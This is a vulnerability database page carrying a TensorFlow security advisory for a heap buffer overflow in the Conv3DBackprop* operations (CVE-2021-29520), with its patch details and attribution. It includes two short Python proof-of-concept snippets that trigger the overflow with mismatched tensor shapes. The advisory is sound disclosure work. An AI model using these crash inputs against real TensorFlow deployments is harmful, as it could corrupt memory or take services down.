Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
osvGoogleOSV:GHSA-WCV5-QRJ6-9PFM
HistoryMay 21, 2021 - 2:21 p.m.

Heap buffer overflow in `Conv3DBackprop*`

2021-05-2114:21:12
Google
osv.dev
10
buffer overflow
conv3dbackprop
tensorflow
security patch
vulnerability
security model
baidu x-team

EPSS

0.001

Percentile

17.8%

JSON

Impact

Missing validation between arguments to tf.raw_ops.Conv3DBackprop* operations can result in heap buffer overflows:

import tensorflow as tf

input_sizes = tf.constant([1, 1, 1, 1, 2], shape=[5], dtype=tf.int32)
filter_tensor = tf.constant([734.6274508233133, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0,
                            -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0,
                            -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0], shape=[4, 1, 6, 1, 1], dtype=tf.float32)
out_backprop = tf.constant([-10.0], shape=[1, 1, 1, 1, 1], dtype=tf.float32)

tf.raw_ops.Conv3DBackpropInputV2(input_sizes=input_sizes, filter=filter_tensor, out_backprop=out_backprop, strides=[1, 89, 29, 89, 1], padding='SAME', data_format='NDHWC', dilations=[1, 1, 1, 1, 1])

import tensorflow as tf

input_values = [-10.0] * (7 * 7 * 7 * 7 * 7)
input_values[0] = 429.6491056791816
input_sizes = tf.constant(input_values, shape=[7, 7, 7, 7, 7], dtype=tf.float32)
filter_tensor = tf.constant([7, 7, 7, 1, 1], shape=[5], dtype=tf.int32)
out_backprop = tf.constant([-10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0], shape=[7, 1, 1, 1, 1], dtype=tf.float32)
  
tf.raw_ops.Conv3DBackpropFilterV2(input=input_sizes, filter_sizes=filter_tensor, out_backprop=out_backprop, strides=[1, 37, 65, 93, 1], padding='VALID', data_format='NDHWC', dilations=[1, 1, 1, 1, 1])

This is because the implementation assumes that the input, filter_sizes and out_backprop tensors have the same shape, as they are accessed in parallel.

Patches

We have patched the issue in GitHub commit 8f37b52e1320d8d72a9529b2468277791a261197.

The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.

For more information

Please consult our securityguide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team.

Related

cvelist 1
nvd 1
osv 5
prion 1
github 1
cve 1
ibm 1
cvelist
cvelist
CVE-2021-29520 Heap buffer overflow in `Conv3DBackprop*`
2021-05-14 19:35:54
nvd
nvd
CVE-2021-29520
2021-05-14 20:15:11
osv
osv
PYSEC-2021-646
2021-05-14 20:15:00
PYSEC-2021-448
2021-05-14 20:15:00
PYSEC-2021-157
2021-05-14 20:15:00
prion
prion
Heap overflow
2021-05-14 20:15:00
github
github
Heap buffer overflow in `Conv3DBackprop*`
2021-05-21 14:21:12
cve
cve
CVE-2021-29520
2021-05-14 20:15:11
ibm
ibm
Security Bulletin: Multiple TensorFlow Vulnerabilities Affect IBM Watson Machine Learning on CP4D
2021-09-02 18:02:20

EPSS

0.001

Percentile

17.8%

JSON
Related for OSV:GHSA-WCV5-QRJ6-9PFM
cvelist1nvd1osv5prion1github1cve1ibm1